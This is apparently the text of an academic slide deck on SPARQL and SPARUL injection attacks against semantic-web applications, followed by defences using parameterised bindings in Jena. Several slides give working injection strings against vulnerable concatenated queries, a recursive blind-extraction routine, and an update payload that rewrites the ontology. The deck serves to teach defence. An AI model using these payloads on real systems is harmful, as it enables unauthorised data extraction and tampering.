    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Introducing Blind SPARQL Injection The previous sample was especially vulnerable since it returned a string It is possible to retrieve any information as a string Strings are usually not retrieved in SPARQL, but individuals What if the returning value is an individual? It’s still possible to retrieve any information If it’s possible to know if a given query is true or false, it’s possible to iteratively retrieve any information The following code retrieves the individuals themselves It’s possible to know if the query provided or not the individuals img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 13.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 4 "SELECT ?p1 ?p2 " + 5 "WHERE {" + 6 " ?p1 a injection:Person . " + 7 " ?p2 a injection:Person . " + 8 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 9 " ?p1 injection:isFriendOf ?p2 . " + 10 "}"; 11 Query query = QueryFactory.create(queryString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 14.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection Once again, the variable name has not been sanitized So it’s still possible to inject SPARQL code The injected code can’t return a building or the building name But, adding a condition like “does the building name start by this letter” we will get: The common results → so the building name starts by that letter No results → so the building name does not start by that letter img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 15.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection 1 String queryString = /* PREFIXES ... */ 2 "SELECT ?p1 ?p2 " + 3 "WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’" + name + "’ˆˆxsd :string . " + 7 " ?p1 injection:isFriendOf ?p2 . " + 8 "}"; 9 String name = "Pablo Orduna’ . " + 10 "?b1 a injection:Building . " + 11 "?b1 injection:name ?buildingName . " + 12 "FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 13 "} #"; // }:-D img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 16.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions The final query would be. . . 1 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 2 "PREFIX injection: <http://www.morelab.deusto.es /injection.owl#> " + 3 "SELECT ?p1 ?p2 WHERE {" + 4 " ?p1 a injection:Person . " + 5 " ?p2 a injection:Person . " + 6 " ?p1 injection:fullName ’Pablo Orduna’ . " + 7 " ?b1 a injection:Building . " + 8 " ?b1 injection:name ?buildingName . " + 9 " FILTER regex(?buildingName, "ˆ" + s + ".*") . " + 10 " } #" + /* from here ignored*/ "’ˆˆxsd:string . " + 11 " ?p1 injection:isFriendOf ?p2 . }"; img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 17.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Querying recursively. . . 1 public static String recursively(String letters) throws Exception{ 2 for(int i = 0; i < POSSIBLE_LETTERS.length(); ++ i){ 3 char c = POSSIBLE_LETTERS.charAt(i); 4 if(tryBlind(letters + c)){ 5 System.out.println(c); 6 return "" + c + recursively(letters + c); 7 } 8 } 9 return ""; 10 } img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 18.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions Blind SPARQL Injection It is possible to optimize this system using binary search Performing queries using Regular Expressions like ˆ[A-M].* to know if the char is between the char A and M Given a charset of length 64, we would reduce the number of iterations from 64 times 10 (640) to 6 times 10 (60) Using the whole UTF-16 charset, it would reduce the number of iterations from 65536 times 10 (655360) to 16 times 10 (160) The point is that it’s possible to retrieve any information in the ontology independently from the values returned by the query img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 19.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection Introducing SPARQL/Update Injection All the previous examples are executed in read-only query languages SPARUL introduces the chance to modify the ontology INSERT, MODIFY and DELETE statements are available The following sample modifies the fullName of the resource injection:Pablo, setting it to the value of the variable name img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 20.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String updateString = "PREFIX injection: <http:// www.morelab.deusto.es/injection.owl#> " + 2 "PREFIX xsd: <http://www.w3.org/2001/XMLSchema#> " + 3 "DELETE {" + 4 " injection:Pablo injection:fullName ?name1 "+ 5 "} WHERE {" + 6 " injection:Pablo injection:fullName ?name1" + 7 "}n INSERT {" + 8 " injection:Pablo injection:fullName ’" + name + "’ˆˆxsd:string" + 9 "}"; 10 UpdateRequest update = UpdateFactory.create( updateString); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 21.
    Introduction SPARQL Injection Vulnerable code samples Blind SPARQL Injection Addressing code injection SPARUL Injection Conclusions SPARUL Injection 1 String name = "Pablo Ordunya’ˆˆxsd:string" + 2 "} n " + 3 "INSERT {" + 4 " injection:Pablo injection:isFriendOf injection:EvilMonkey" + 5 "} #"; // }:-D 6 String result = sample.run(name); With this vulnerability, it is possible to modify the whole ontology. img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 22.
    Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Addressing code injection Mechanisms provided by the library must be used (if provided) Not as simple as scaping the ’ characters: the string u0027 is a simple quote, just as in Java 1 System.out.println("au0022.length() + u0022b".length()); 2 // This code prints "2", the result of ("a".length() + "b".length()) 3 // since u0022 will be replaced by " even if it is commented or inside 4 // String img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 23.
    Introduction Vulnerable code samples Introduction Addressing code injection Conclusions Frameworks In Jena, the initialBinding argument can be used in the QueryExecutionFactory 1 // initial binding 2 QuerySolutionMap initialBinding = new QuerySolutionMap(); 3 RDFNode parameterizedName = model.createLiteral( name); 4 initialSetting.add("thename", parameterizedName); 5 6 // Perform the query 7 Query query = QueryFactory.create(queryString); 8 QueryExecution qe = QueryExecutionFactory.create( query, model, initialBinding); 9 ResultSet results = qe.execSelect(); img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 24.
    Introduction Vulnerable code samples Addressing code injection Conclusions Conclusions Not sanitizing the user input might add a set of security vulnerabilities in our systems In the paper it is presented how new query languages inherit security issues present in older query languages, and therefore they should also be taken into account when working with them img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .
  • 25.
    Introduction Vulnerable code samples Addressing code injection Conclusions Questions? DeustoTech - Internet http://www.morelab.deusto.es Pablo Ordu˜an pablo.orduna@deusto.es Aitor Almeida aitor.almeida@deusto.es Unai Aguilera unai.aguilera@deusto.es Xabier Laiseca xabier.laiseca@deusto.es Diego L´pez-de-Ipi˜a o n dipina@deusto.es Aitor G´mez-Goiri o aitor.gomez@deusto.es img/deustotech.png P. Ordu˜a, A. Almeida, U. Aguilera, X. Laiseca, D. L´pez-de. . . n o Addressing Security Issues in the Semantic Web: Injection att. . .